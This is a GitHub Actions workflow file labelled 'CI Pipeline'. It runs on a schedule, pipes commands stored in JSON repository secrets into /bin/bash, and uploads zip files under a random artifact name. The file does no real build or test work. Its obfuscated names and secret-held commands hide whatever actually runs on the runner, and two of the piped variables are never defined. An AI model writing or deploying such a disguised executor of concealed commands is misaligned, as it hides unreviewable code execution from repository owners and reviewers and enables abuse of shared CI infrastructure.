name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '44 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          qty391: ${{ secrets.qty391 }}
        run: |
          printf '%s' "$qty391" | jq -r .kzi3860 | /bin/bash
          printf '%s' "$tssxm51830" | jq -r .s1 | /bin/bash
          printf '%s' "$xkvy49" | jq -r .ft7 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: h0AQrL50
          path: "*.zip"
          retention-days: 1
